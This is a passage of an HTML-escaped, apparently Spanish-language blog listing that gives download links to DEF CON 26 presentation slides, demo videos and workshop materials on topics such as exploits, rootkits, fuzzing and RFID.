&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2026/DEF%20CON%2026%20presentations/Xiaolong%20Bai%20and%20Min%20Zheng/DEFCON-26-Xiaolong-Bai-and-Min-Zheng-Demo-Video/DemoOnPage78.mp4"&gt;DemoOnPage78.mp4&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2026/DEF%20CON%2026%20presentations/Xiaolong%20Bai%20and%20Min%20Zheng/DEFCON-26-Xiaolong-Bai-and-Min-Zheng-One-Bite-And-All-Your-Dreams-Will-Come-True.pdf"&gt;Xiaolong-Bai-and-Min-Zheng-One-Bite-And-All-Your-Dreams-Will-Come-True.pdf&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;Zach Miller and Alex Kissinger

&lt;ul&gt;
&lt;li&gt;DEFCON-26-Zach-Miller-and-Alex-Kissinger-Demo-Videos

&lt;ul&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2026/DEF%20CON%2026%20presentations/Zach%20Miller%20and%20Alex%20Kissinger/DEFCON-26-Zach-Miller-and-Alex-Kissinger-Demo-Videos/demo-1-command-file-exploit.mp4"&gt;demo-1-command-file-exploit.mp4&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2026/DEF%20CON%2026%20presentations/Zach%20Miller%20and%20Alex%20Kissinger/DEFCON-26-Zach-Miller-and-Alex-Kissinger-Demo-Videos/demo-2-telnet-exploit.mp4"&gt;demo-2-telnet-exploit.mp4&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2026/DEF%20CON%2026%20presentations/Zach%20Miller%20and%20Alex%20Kissinger/DEFCON-26-Zach-Miller-and-Alex-Kissinger-Demo-Videos/demo-3-mlwar.mp4"&gt;demo-3-mlwar.mp4&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2026/DEF%20CON%2026%20presentations/Zach%20Miller%20and%20Alex%20Kissinger/DEFCON-26-Zach-Miller-and-Alex-Kissinger-Infecting-Embedded-Supply-Chain.pdf"&gt;Zach-Miller-and-Alex-Kissinger-Infecting-Embedded-Supply-Chain.pdf&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;Zach Miller and Alex Kissinger - Updated

&lt;ul&gt;
&lt;li&gt;Zach Miller and Alex Kissinger - Extras

&lt;ul&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2026/DEF%20CON%2026%20presentations/Zach%20Miller%20and%20Alex%20Kissinger%20-%20Updated/Zach%20Miller%20and%20Alex%20Kissinger%20-%20Extras/demo3_mlwar_v2.ogv"&gt;demo3_mlwar_v2.ogv&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2026/DEF%20CON%2026%20presentations/Zach%20Miller%20and%20Alex%20Kissinger%20-%20Updated/Zach%20Miller%20and%20Alex%20Kissinger%20-%20Extras/demo4_brute_force_and_dump_fw.mp4"&gt;demo4_brute_force_and_dump_fw.mp4&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2026/DEF%20CON%2026%20presentations/Zach%20Miller%20and%20Alex%20Kissinger%20-%20Updated/DEFCON-26-Zach-Miller-and-Alex-Kissinger-Infecting-Embedded-Supply-Chain-Updated.pdf"&gt;Zach-Miller-and-Alex-Kissinger-Infecting-Embedded-Supply-Chain-Updated.pdf&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;nevermoe

&lt;ul&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2026/DEF%20CON%2026%20presentations/nevermoe/DEFCON-26-nevermoe-One-Step-Before-Game-Hackers-Andriod-Emulators-cheat-Demo-Video.mp4"&gt;nevermoe-One-Step-Before-Game-Hackers-Andriod-Emulators-cheat-Demo-Video.mp4&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2026/DEF%20CON%2026%20presentations/nevermoe/DEFCON-26-nevermoe-One-Step-Before-Game-Hackers-Andriod-Emulators.pdf"&gt;nevermoe-One-Step-Before-Game-Hackers-Andriod-Emulators.pdf&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;sghctoma

&lt;ul&gt;
&lt;li&gt;DEFCON-26-sghctoma-Demo-Videos

&lt;ul&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2026/DEF%20CON%2026%20presentations/sghctoma/DEFCON-26-sghctoma-Demo-Videos/maple/"&gt;maple/&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2026/DEF%20CON%2026%20presentations/sghctoma/DEFCON-26-sghctoma-Demo-Videos/mathematica/"&gt;mathematica/&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2026/DEF%20CON%2026%20presentations/sghctoma/DEFCON-26-sghctoma-Demo-Videos/matlab/"&gt;matlab/&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2026/DEF%20CON%2026%20presentations/sghctoma/DEFCON-26-sghctoma-all-your-math-are-belong-to-us.pdf"&gt;sghctoma-all-your-math-are-belong-to-us.pdf&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;singe

&lt;ul&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2026/DEF%20CON%2026%20presentations/singe/DEFCON-26-singe-Practical-and-Improved-Wifi-MitM-with-Mana-eap-relay-v1.mp4"&gt;singe-Practical-and-Improved-Wifi-MitM-with-Mana-eap-relay-v1.mp4&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2026/DEF%20CON%2026%20presentations/singe/DEFCON-26-singe-Practical-and-Improved-Wifi-MitM-with-Mana.pdf"&gt;singe-Practical-and-Improved-Wifi-MitM-with-Mana.pdf&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;smea

&lt;ul&gt;
&lt;li&gt;DEFCON-26-smea-Jailbreaking-the-3DS-Demo-Videos

&lt;ul&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2026/DEF%20CON%2026%20presentations/smea/DEFCON-26-smea-Jailbreaking-the-3DS-Demo-Videos/fuzz.mp4"&gt;fuzz.mp4&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2026/DEF%20CON%2026%20presentations/smea/DEFCON-26-smea-Jailbreaking-the-3DS-Demo-Videos/hbmenu.mp4"&gt;hbmenu.mp4&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2026/DEF%20CON%2026%20presentations/smea/DEFCON-26-smea-Jailbreaking-the-3DS-Demo-Videos/mcopy.mp4"&gt;mcopy.mp4&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2026/DEF%20CON%2026%20presentations/smea/DEFCON-26-smea-Jailbreaking-the-3DS-Demo-Videos/ninjhax.mp4"&gt;ninjhax.mp4&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2026/DEF%20CON%2026%20presentations/smea/DEFCON-26-smea-Jailbreaking-the-3DS-Demo-Videos/tubehax.mp4"&gt;tubehax.mp4&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2026/DEF%20CON%2026%20presentations/smea/DEFCON-26-smea-Jailbreaking-the-3DS.pdf"&gt;smea-Jailbreaking-the-3DS.pdf&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2026/DEF%20CON%2026%20presentations/DEFCON-26-Alex-Levinson-Overview-of-Genesis-Scripting-Engine.pdf"&gt;Alex-Levinson-Overview-of-Genesis-Scripting-Engine.pdf&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2026/DEF%20CON%2026%20presentations/DEFCON-26-Alexandre-Borges-Ring-02-Rootkits-bypassing-defenses-Updated.pdf"&gt;Alexandre-Borges-Ring-02-Rootkits-bypassing-defenses-Updated.pdf&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2026/DEF%20CON%2026%20presentations/DEFCON-26-Alexandre-Borges-Ring-02-Rootkits-bypassing-defenses.pdf"&gt;Alexandre-Borges-Ring-02-Rootkits-bypassing-defenses.pdf&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2026/DEF%20CON%2026%20presentations/DEFCON-26-Alfonso-Garcia-and-Alejo-Murillo-Playback-a-TLS-story.pdf"&gt;Alfonso-Garcia-and-Alejo-Murillo-Playback-a-TLS-story.pdf&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2026/DEF%20CON%2026%20presentations/DEFCON-26-Crowley-Paredes-Savage-Outsmarting-the-Smart-City.pdf"&gt;Crowley-Paredes-Savage-Outsmarting-the-Smart-City.pdf&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2026/DEF%20CON%2026%20presentations/DEFCON-26-Eckert-Sumner-Krause-Inside-the-Fake-Science-Factory.pdf"&gt;Eckert-Sumner-Krause-Inside-the-Fake-Science-Factory.pdf&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2026/DEF%20CON%2026%20presentations/DEFCON-26-Eduardo-Izycki-And-Rodrigo-Colli-Digital-Leviathan-Nation-State-Big-Brothers.pdf"&gt;Eduardo-Izycki-And-Rodrigo-Colli-Digital-Leviathan-Nation-State-Big-Brothers.pdf&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2026/DEF%20CON%2026%20presentations/DEFCON-26-Egypt-One-Liners-to-Rule-Them-All.pdf"&gt;Egypt-One-Liners-to-Rule-Them-All.pdf&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2026/DEF%20CON%2026%20presentations/DEFCON-26-Fireside-Panel-D0-N0-H4RM.pdf"&gt;Fireside-Panel-D0-N0-H4RM.pdf&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2026/DEF%20CON%2026%20presentations/DEFCON-26-Fireside-Panel-Goerzen-and-Matthews-Beyond-The-Lulz-Updated.pdf"&gt;Fireside-Panel-Goerzen-and-Matthews-Beyond-The-Lulz-Updated.pdf&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2026/DEF%20CON%2026%20presentations/DEFCON-26-Fireside-Panel-Goerzen-and-Matthews-Beyond-The-Lulz.pdf"&gt;Fireside-Panel-Goerzen-and-Matthews-Beyond-The-Lulz.pdf&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2026/DEF%20CON%2026%20presentations/DEFCON-26-Foster-and-Ayrey-Lost-and-Found-Certs-residual-certs-for-pre-owned-domains.pdf"&gt;Foster-and-Ayrey-Lost-and-Found-Certs-residual-certs-for-pre-owned-domains.pdf&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2026/DEF%20CON%2026%20presentations/DEFCON-26-Galloway-and-Yunusov-For-the-love-of-Money-Finding-And-Exploiting-Vulns-In-Mobile-POS-Updated.pdf"&gt;Galloway-and-Yunusov-For-the-love-of-Money-Finding-And-Exploiting-Vulns-In-Mobile-POS-Updated.pdf&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2026/DEF%20CON%2026%20presentations/DEFCON-26-Ian-Haken-Automated-Discovery-of-Deserialization-Gadget-Chains.pdf"&gt;Ian-Haken-Automated-Discovery-of-Deserialization-Gadget-Chains.pdf&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2026/DEF%20CON%2026%20presentations/DEFCON-26-Jianjun-Dai-Guang-Gong-Wenlin-Yang-Pwning-The-Toughest-Target-Updated.pdf"&gt;Jianjun-Dai-Guang-Gong-Wenlin-Yang-Pwning-The-Toughest-Target-Updated.pdf&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2026/DEF%20CON%2026%20presentations/DEFCON-26-Jianjun-Dai-Guang-Gong-Wenlin-Yang-Pwning-The-Toughest-Target.pdf"&gt;Jianjun-Dai-Guang-Gong-Wenlin-Yang-Pwning-The-Toughest-Target.pdf&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2026/DEF%20CON%2026%20presentations/DEFCON-26-Joe-Grand-Searching-for-the-Light-Adventures-w-Opticspy.pdf"&gt;Joe-Grand-Searching-for-the-Light-Adventures-w-Opticspy.pdf&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2026/DEF%20CON%2026%20presentations/DEFCON-26-Josep-Rodriguez-Breaking-Extreme-Networks-WingOS-Updated.pdf"&gt;Josep-Rodriguez-Breaking-Extreme-Networks-WingOS-Updated.pdf&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2026/DEF%20CON%2026%20presentations/DEFCON-26-Lawshae-Who-Controls-the-Controllers-Hacking-Crestron.pdf"&gt;Lawshae-Who-Controls-the-Controllers-Hacking-Crestron.pdf&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2026/DEF%20CON%2026%20presentations/DEFCON-26-Maggie-Mayhem-Sex-Work-After-SESTA.pdf"&gt;Maggie-Mayhem-Sex-Work-After-SESTA.pdf&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2026/DEF%20CON%2026%20presentations/DEFCON-26-Maksim-Shudrak-Fuzzing-Malware-For-Fun-and-Profit.pdf"&gt;Maksim-Shudrak-Fuzzing-Malware-For-Fun-and-Profit.pdf&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2026/DEF%20CON%2026%20presentations/DEFCON-26-Matt-King-Micro-Renovator-Bringing-Proc-Firmware-Up-To-Code.pdf"&gt;Matt-King-Micro-Renovator-Bringing-Proc-Firmware-Up-To-Code.pdf&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2026/DEF%20CON%2026%20presentations/DEFCON-26-Matt-Knight-and-Ryan-Speers-RF-Fuzzing-Tools-to-Expose-PHY-Layer-Vulns.pdf"&gt;Matt-Knight-and-Ryan-Speers-RF-Fuzzing-Tools-to-Expose-PHY-Layer-Vulns.pdf&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2026/DEF%20CON%2026%20presentations/DEFCON-26-Matt-Wixey-Betrayed-by-the-Keyboard-Updated.pdf"&gt;Matt-Wixey-Betrayed-by-the-Keyboard-Updated.pdf&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2026/DEF%20CON%2026%20presentations/DEFCON-26-Matt-Wixey-Betrayed-by-the-Keyboard.pdf"&gt;Matt-Wixey-Betrayed-by-the-Keyboard.pdf&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2026/DEF%20CON%2026%20presentations/DEFCON-26-Matthews-Adams-Greco-Youre-Just-Complaining-Because-Youre-Guilty.pdf"&gt;Matthews-Adams-Greco-Youre-Just-Complaining-Because-Youre-Guilty.pdf&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2026/DEF%20CON%2026%20presentations/DEFCON-26-Michael-Ossmann-and-Dominic-Spill-Revolting-Radios.pdf"&gt;Michael-Ossmann-and-Dominic-Spill-Revolting-Radios.pdf&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2026/DEF%20CON%2026%20presentations/DEFCON-26-Min-Zheng-Xiaolong-Bai-Fasten-your-Seatbelts-Escaping-iOS-11-Sandbox.pdf"&gt;Min-Zheng-Xiaolong-Bai-Fasten-your-Seatbelts-Escaping-iOS-11-Sandbox.pdf&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2026/DEF%20CON%2026%20presentations/DEFCON-26-Nils-Amiet-and-Yonal-Romailler-Reaping-and-breaking-keys-at-scale-when-crypto-meets-big-data.pdf"&gt;Nils-Amiet-and-Yonal-Romailler-Reaping-and-breaking-keys-at-scale-when-crypto-meets-big-data.pdf&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2026/DEF%20CON%2026%20presentations/DEFCON-26-Orange-Tsai-Breaking-Parser-Logic-Take-Your-Path-Normalization-Off-and-Pop-0days-Out.pdf"&gt;Orange-Tsai-Breaking-Parser-Logic-Take-Your-Path-Normalization-Off-and-Pop-0days-Out.pdf&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2026/DEF%20CON%2026%20presentations/DEFCON-26-Panel-DCGroups.pdf"&gt;Panel-DCGroups.pdf&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2026/DEF%20CON%2026%20presentations/DEFCON-26-Paternotte-and-van-Ommeren-It-WISNt-Me-Attacking-Industrial-Wireless-Mesh.pdf"&gt;Paternotte-and-van-Ommeren-It-WISNt-Me-Attacking-Industrial-Wireless-Mesh.pdf&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2026/DEF%20CON%2026%20presentations/DEFCON-26-Rachel-Greenstadt-and-Aylin-Caliskan-De-anonymizing-Programmers.pdf"&gt;Rachel-Greenstadt-and-Aylin-Caliskan-De-anonymizing-Programmers.pdf&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2026/DEF%20CON%2026%20presentations/DEFCON-26-Richard-Thieme-The-Road-to-Resilience%20.pdf"&gt;Richard-Thieme-The-Road-to-Resilience .pdf&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2026/DEF%20CON%2026%20presentations/DEFCON-26-Rob-Joyce-Absurd-Xmas-Lights.pdf"&gt;Rob-Joyce-Absurd-Xmas-Lights.pdf&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2026/DEF%20CON%2026%20presentations/DEFCON-26-Rousseau-and-Seymour-Finding-Xori-Malware-Analysis-Triage-w-Auto-Disassembly.pdf"&gt;Rousseau-and-Seymour-Finding-Xori-Malware-Analysis-Triage-w-Auto-Disassembly.pdf&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2026/DEF%20CON%2026%20presentations/DEFCON-26-Seamus-Burke-Journey-Into-Hexagon.pdf"&gt;Seamus-Burke-Journey-Into-Hexagon.pdf&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2026/DEF%20CON%2026%20presentations/DEFCON-26-Sean-Metcalf-Exploiting-Administrator-Insecurities.pdf"&gt;Sean-Metcalf-Exploiting-Administrator-Insecurities.pdf&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2026/DEF%20CON%2026%20presentations/DEFCON-26-Shortxstack-and-Seth-Law-Building-the-Hacker-tracker.pdf"&gt;Shortxstack-and-Seth-Law-Building-the-Hacker-tracker.pdf&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2026/DEF%20CON%2026%20presentations/DEFCON-26-Si-and-AgentX-Wagging-The-Tail.pdf"&gt;Si-and-AgentX-Wagging-The-Tail.pdf&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2026/DEF%20CON%2026%20presentations/DEFCON-26-Steven-Danneman-Your-Banks-Digital-Side-Door.pdf"&gt;Steven-Danneman-Your-Banks-Digital-Side-Door.pdf&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2026/DEF%20CON%2026%20presentations/DEFCON-26-Yaniv-Balmas-What-The-FAX.pdf"&gt;Yaniv-Balmas-What-The-FAX.pdf&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2026/DEF%20CON%2026%20presentations/DEFCON-26-YawnBox-Emerald-Onion-Privacy-Infrastructure-Challenges-and-Opportunites.pdf"&gt;YawnBox-Emerald-Onion-Privacy-Infrastructure-Challenges-and-Opportunites.pdf&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2026/DEF%20CON%2026%20presentations/DEFCON-26-Yu-Wang-Attacking-The-MacOS-Kernel-Graphics-Driver.pdf"&gt;Yu-Wang-Attacking-The-MacOS-Kernel-Graphics-Driver.pdf&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2026/DEF%20CON%2026%20presentations/DEFCON-26-Yuwei-Zheng-Shaokun-Cao-Bypass-the-SecureBoot-and-etc-on-NXP-SOCs-Updated.pdf"&gt;Yuwei-Zheng-Shaokun-Cao-Bypass-the-SecureBoot-and-etc-on-NXP-SOCs-Updated.pdf&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2026/DEF%20CON%2026%20presentations/DEFCON-26-Yuwei-Zheng-Shaokun-Cao-Bypass-the-SecureBoot-and-etc-on-NXP-SOCs.pdf"&gt;Yuwei-Zheng-Shaokun-Cao-Bypass-the-SecureBoot-and-etc-on-NXP-SOCs.pdf&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2026/DEF%20CON%2026%20presentations/DEFCON-26-zerosum0x0-Eternal-Exploits.pdf"&gt;zerosum0x0-Eternal-Exploits.pdf&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;div style="text-align: justify;"&gt;
También se realizaron &lt;b&gt;workshops&lt;/b&gt; que puedes descargar todos en &lt;a href="https://media.defcon.org/DEF%20CON%2026/DEF%20CON%2026%20workshops.rar" rel="nofollow" target="_blank"&gt;formato RAR&lt;/a&gt;, por &lt;a href="https://media.defcon.org/DEF%20CON%2026/DEF%20CON%2026%20workshops.torrent" rel="nofollow" target="_blank"&gt;torrent&lt;/a&gt; o cada archivo por separado:&lt;/div&gt;
&lt;br /&gt;
&lt;ul&gt;
&lt;li&gt;DEFCON-26-Workshop-Vinnie-Vanhoecke-and-Lorenzo-Bernardi-Playing-With-RFID

&lt;ul&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2026/DEF%20CON%2026%20workshops/DEFCON-26-Workshop-Vinnie-Vanhoecke-and-Lorenzo-Bernardi-Playing-With-RFID/DEFCON-26-Workshop-Vinnie-Vanhoecke-and-Lorenzo-Bernardi-Playing-With-RFID-Theory.pdf"&gt;Workshop-Vinnie-Vanhoecke-and-Lorenzo-Bernardi-Playing-With-RFID-Theory.pdf&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2026/DEF%20CON%2026%20workshops/DEFCON-26-Workshop-Vinnie-Vanhoecke-and-Lorenzo-Bernardi-Playing-With-RFID/DEFCON-26-Workshop-Vinnie-Vanhoecke-and-Lorenzo-Bernardi-Playing-With-RFID.pdf"&gt;Workshop-Vinnie-Vanhoecke-and-Lorenzo-Bernardi-Playing-With-RFID.pdf&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;DEFCON-26-Workshop-Wesley-McGrew-Penetration-Testing-in-Hostile-Environments

&lt;ul&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2026/DEF%20CON%2026%20workshops/DEFCON-26-Workshop-Wesley-McGrew-Penetration-Testing-in-Hostile-Environments/DEFCON-26-Workshop-Wesley-McGrew-Penetration-Testing-in-Hostile-Environments-Student-Preparation.pdf"&gt;Workshop-Wesley-McGrew-Penetration-Testing-in-Hostile-Environments-Student-Preparation.pdf&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2026/DEF%20CON%2026%20workshops/DEFCON-26-Workshop-Wesley-McGrew-Penetration-Testing-in-Hostile-Environments/DEFCON-26-Workshop-Wesley-McGrew-Penetration-Testing-in-Hostile-Environments-Whitepaper.pdf"&gt;Workshop-Wesley-McGrew-Penetration-Testing-in-Hostile-Environments-Whitepaper.pdf&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2026/DEF%20CON%2026%20workshops/DEFCON-26-Workshop-Adam-Steed-and-James-Albany-Attacking-Active-Directory-and-Advanced-Methods-of-Defense-2018.pdf"&gt;Workshop-Adam-Steed-and-James-Albany-Attacking-Active-Directory-and-Advanced-Methods-of-Defense-2018.pdf&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2026/DEF%20CON%2026%20workshops/DEFCON-26-Workshop-Alexandrine-Torrents-and-Arnaud-Soullie-Pentesting-ICS-101.pdf"&gt;Workshop-Alexandrine-Torrents-and-Arnaud-Soullie-Pentesting-ICS-101.pdf&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2026/DEF%20CON%2026%20workshops/DEFCON-26-Workshop-Arun-Magesh-Buzzing-Smart-Devices.pdf"&gt;Workshop-Arun-Magesh-Buzzing-Smart-Devices.pdf&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2026/DEF%20CON%2026%20workshops/DEFCON-26-Workshop-Bryce-Kunz-and-Kevin-Lustic-Fuzzing-FTW.pdf"&gt;Workshop-Bryce-Kunz-and-Kevin-Lustic-Fuzzing-FTW.pdf&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2026/DEF%20CON%2026%20workshops/DEFCON-26-Workshop-Dave-Porcello-and-Sean-Gallagher-Packet-Mining-for-Privacy-Leakage.pdf"&gt;Workshop-Dave-Porcello-and-Sean-Gallagher-Packet-Mining-for-Privacy-Leakage.pdf&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2026/DEF%20CON%2026%20workshops/DEFCON-26-Workshop-David-Pearson-The-Truth-is-in-the-Network_-Reverse-Engineering-Application-Layer-Protocols-Via-PCAP.pdf"&gt;Workshop-David-Pearson-The-Truth-is-in-the-Network_-Reverse-Engineering-Application-Layer-Protocols-Via-PCAP.pdf&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2026/DEF%20CON%2026%20workshops/DEFCON-26-Workshop-David-Turco-and-Jon-Overgaard-Christiansen-Wheres-My-Browser-Learn-Hacking-iOS-and-Android-WebViews.pdf"&gt;Workshop-David-Turco-and-Jon-Overgaard-Christiansen-Wheres-My-Browser-Learn-Hacking-iOS-and-Android-WebViews.pdf&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2026/DEF%20CON%2026%20workshops/DEFCON-26-Workshop-Eijah-Decentralized-Hacker-Net.pdf"&gt;Workshop-Eijah-Decentralized-Hacker-Net.pdf&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2026/DEF%20CON%2026%20workshops/DEFCON-26-Workshop-Jakub-Botwicz-and-Wojciech-Rauner-Fuzzing-with-AFL-(American-Fuzzy-Lop).pdf"&gt;Workshop-Jakub-Botwicz-and-Wojciech-Rauner-Fuzzing-with-AFL-(American-Fuzzy-Lop).pdf&lt;/a&gt;&lt;/li&gt;
